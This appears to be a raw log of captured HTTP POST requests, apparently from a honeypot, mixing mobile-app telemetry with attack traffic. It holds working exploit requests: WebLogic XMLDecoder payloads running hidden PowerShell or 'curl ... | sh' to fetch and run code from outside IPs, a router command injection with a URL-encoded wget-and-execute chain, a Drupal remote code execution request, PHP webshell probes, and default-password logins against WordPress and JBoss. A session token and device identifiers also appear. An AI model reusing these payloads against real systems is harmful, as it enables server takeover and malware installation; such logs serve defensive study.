User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2380
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache
log=admin&pwd=admin00000
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
EKNZl9/PY58x98dtxlzYzn8W6wndFsMfom6557/4XAuRLSGEn3k+o2ZBIIZVaiU5U7lDk8EK3/je8rELgjHcg2zJeAk2Z1K2g8efIFONQxAJkzB6KZ1JwQk7Fb7EOwNNiMR+BYe6u9xqZpy/Fm+W1lFvgX2G0YfM5Z3sWRHDHoqh1zB9eiaeiuBzzPte1XWZK0fyp89zPhI3xbXq735Z6NfZoeYDFGlMHO0ksvOF9wT0sUKY9iCyYnCrEVt8FYCBUXQIKj7Y6DZTr5Zv6YaRitreIKTi3jf61MJ56ImyEDpyh56YW7kvowqtKtmIRztpkORZFmXUKu7d9spnLSx09AzJG6CNLzs+QvoLSPL5Xrgw3COBRSMNHO/L+j1NEBK3RQ==
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=cZO21cwcwnOShCsHHtt9imY0WmkhApO
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
341404
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
01488cc2a3e74345bcdd90984a495537
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--cZO21cwcwnOShCsHHtt9imY0WmkhApO
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--cZO21cwcwnOShCsHHtt9imY0WmkhApO--
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
m=die('Hello, Peppa!')
POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
766602
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
bb0a49bd73b947ee14ccb283d7a89812
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw--
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149564936935&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://apkquery.ksmobile.net/fqexpack HTTP/1.1
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: apkquery.ksmobile.net
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 59
;∂.-gRZr9V_^$k^^Fyc5.úfi iÛqÆÅ'R∏≥i´ ˜∑3PßÄÚ!ßnD
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149661776009&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
VA23nX0WB6moh90T2jBOAvkC/3ywq7VBt8t8DF1MoM4YGDpK4eTfnheY59tVsVXzvqFawnI036hHyLKwd75ZBxvve+gAFggAVlGEgM6YDF781PbbqLCYUAU6CMI59j7TnMyNsgiS+tfahMRXvokGzFrai+qlCzxWCWTXBOxvkXRonADWr/ZvVMaaSzxEwV9E9+Ynk3KcR7zxTmUXOyLQAliF8/sNo1UUlNZkz3mou+++iB9pfiMSbPk3qaJ4+fDKu+TVZQm11XMEs9X7Giw9AWe5E886BbtWfvLRo3Wq7Tnc8KczPoWSEQRDXXll07Kb9srjUCsAcSki+Zl/0smgeF2r+RP0GO1VmXXfDSEI1o3wFyk=
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
m=die((string)(111111111*9))
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
QfFck9jIMXHw+glkGFjFMp3/ABI5e7oogYdb7hXSxHhlj19Sj9XnZnDq5rcdAEHfK32UJ85lKiwXB2XtfB1fGzcM75jL63cKsjufnEzb4ABTUK58m6Ie7apPeZlROTk65ZqnvBUiS9lnxC+2WnuXaza08N4d2rxDkjjF9wnL6kCJk7RkI5Hw+B1nlidK4QnF6jt0+3adxJXE+k1c1TZClSa9ZIVxtAqyWMXnyd+Qg1FFkZedqHd9EBOv01WH0LmYLqjoSd9kpyATPiHD9k/ABrF0c64g5EUf43Xtje8XX82ihiwUPQInGmLgjVXhZJqGy3/Y8pTLyZKTl6/3Rtmcg0uaTTEGuwHvSG03gjue+87e/Vcs6P7tXNMwEu3ka3FfLFTTGT4ZYCOTYQH7NwWxoXGCtNSXAA9bg1A89g3KHrTj+Wq0hs3g5qg=
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149649063497&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://t7.proxy-checks.com/favicon.ico HTTP/1.1
Host: t7.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149551543589&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://check.proxyradar.com/azenv.php?auth=152804410593&a=PSCMN&i=759097799&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache
Q6QPxY/LY8jwFad8zx4evrfIUcRyFd05WHNfMuRcEXM+yV3fmi6TwMXYj4/I8BJt9phhv5I+x/xX3LQJeasjSZSg6wxyVF5GG6Ve0+LIsccolydDcGyB4/DfLXvSO9KcY/GCMI3wVXPypD0huw1ipGtmr70E20U0E8YPTGdtmtUp50fOTCnQxwE1FB9ffdbIiZxX+isz1tFRmyc+dd86S5hnLD2qTCRjuxS7+MuBZ+zBm8qE8mE83aO2CVPu7GBqubpnK0MoR1464whLthcDJCcAXHof64RuwIpwXmdd8IXjrRrx6DSs/II+0rOW979C9SK+odbxDlWogfhoAd56dAmWzSUQ6zYRmpl6ZgpQn0dZ
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 30
Cache-Control: no-cache
log=jamesatchue&pwd=qwertyuiop
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: application/x-www-form-urlencoded
Content-length: 170
form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST /?q=/file/ajax/name/%23value/ HTTP/1.1
Host: x.x.x.x:8080
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 14
Content-Type: application/x-www-form-urlencoded
form_build_id=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
EaIPw9uZZVESDKfURZcBl4HW7rCnbifESyJ4uqYZvpvc2hopVxC7uPavcie94LWThEFfcTOzvPFnRBn9sj+ZYNE7L+w6Pwdw6aagqnVmoX4fJvtQtfbHtjQYmuW63uSxBHMp1IIHxFkDuH8PmaldMS8JIW7ZiT4OxEMBKqNdF/yV1MpTkcPAPLjwTeJXtR4cqAc/s1cKowoPUcUC7dGHmmd6biU30b/C+y90HW++ftA21BFiF4NCs9ZmM40mjasvawEA8z9yZSKra/rRVwRs8nTi7q07k8hHBc6oK/jnNBmKsIO7y8VTXndq5PajrV0NJD7WPr/RLrp2qWcYYYf4yvSn7xAneMn6bWeOOe474k2ROsBD4Ghrpiw=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
RfFfx9zKYOg3ARbQPRnzbw/uidttKI47+vfQuZBK24wbm8HixlH03Dy90tXHt+XZUbeD6KVlyazj0U+JraR49Uu9O7QFS97JCOUAN/SvDIKYqXIFD4hUsucJ4E0wN12efSJZ4gSiWCxU29nJab+9TCfXNOKuQ4sPBWe2YL6MiTU65wliYOJ7v2a/1Dlvj3frufivgxCgPjYYlT+DopuCZuQrrJvb0kuuUd+OSqXQU3ovzdPM2NSVFamTej4o3jy+kL+p3G3EqYDqNvijPUXAGhvWVAPt2ehktE2qBY6z1XMnLVqpc8Ln6cqacxCJdcrbxle5k2MnvXWnq7GqQhcRfIcaHYVdChVjRI4k2/nXG9DR46hnhb/doTuBNhqwj3ju7v2f7CeXDB7q0FDaCN1QDsyyJpC1GwiqUPAEy3NYxVhgD6olL1Xa
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
E6JaxtPKbYZF+HoFqxaMWfL0RsafdA9blkyrCuAPy/74GiBAtOmGJXgIWQuvHXYSvAJ8cq8xoLh6d3PaYUFQss6mvReAmpUXFQTnJn3haMzPn2uPdFkwORK98v7o7rj3kopH0Mca9unef/CFCQaAU3bk1tNM9E3v8UlT1KPmEUDNokpfinP0P/LheWavG6tWx8KHcIOw4v5C8mN2GDv2oADmN/Q+uwPmH+vmU6YSz6C97XsjPYuv69ZLyIdVCjQRw/49cc43RNPZcw/vz5RPdHErUbbJhhaLooj29Iyw1riuEEeMN4PgB6VgSXFELikvt0vjZ+oWB5sWjGV0RZnkL6tzRQXvWNsjZohcFa3EDFmUfcRjh5/0vsQwisPLnUY9b3OKREv2sgQ9lA3zXrYhjmRjR4fIOvCefZBQpHhzYd4=
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477775191889
X-Umeng-Sdk: Android/5.6.7 live.ly%2F3.3+GT-N8013%2F6.0.1+0C1D8E62E7F766B118C17CFA99A28899
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.co
Connection: Keep-Alive
Accept-Encoding: gzip
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂”âÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
FPEKxtLKZLUmQ38m74n0g2itc/Rb5Yhumo4daBnbXyp+5kGUcyQXblbY3EU6ME4MlVliDQjWS3vqaZzhYH+JBMeOD2aljahGG+IbzTwi5KEnqj1DeQlUg4A1+8vnlIg39edml/35U/QR44fsIAn5//p1AKtVB1nVn58Gy+LD1D12O23vCewRGVqhpffgXRyfsTmhcOS5zkS1UHF13v0RGB49Xzj1fEA468f+qGl1OLPyQXb4VjUFnBy9aEyU85/efDx3QwjPPXB+eBnNMTA9Bts+D7BFhc3xbtAV5BtgcBZpxaed7pph79z8u1ks7/4iJauFVYr5uxuZsYD20wMlpxEby+THMeOnzGmTWC+ZmlbCntv7o0+qjg1kLkroRvPVqF3N5j1ZLxhJcPBAXA==
POST http://market.xiaomi.com/thm/checkupdate/hashpair HTTP/1.1
Cookie: serviceToken=0QxjFrjieRMkJ7AH4gTZJJB7i/AE4FAwfcvaQeeZRjmYNLpd68wgPP8d8dNjhkPiNUZ19a+uM9QeraZIhcAhHcTGf+v3zPAsinFkt3ZEVhj6ix7LJl1+Jtgx8QOXp//SJY+GqTsKxII7jabjdfPy8ZnNeGf8QpEG290kf3rCW/fUbfA6ShVSenX25U5lEEnHSHUPWgRMTP6GBvDsDxrDew==; cUserId=UmHQgtJ2PWdwXIYZq1PwDfYMMzY
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
Host: market.xiaomi.com
Connection: Keep-Alive
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åt(ÛÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl
POST http://p-behacdn.ksmobile.net/cu HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 72
H°º(œÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcékV∏iRËc^<»cGcrjChC*YÈZ&>0N
POST /admin-console/login.seam HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
login_form=login_form&login_form%3Aname=admin&login_form%3Apassword=admin&login_form%3Asubmit=Login&javax.faces.ViewState=
POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&net=2&k=1 HTTP/1.1
Content-Length: 896
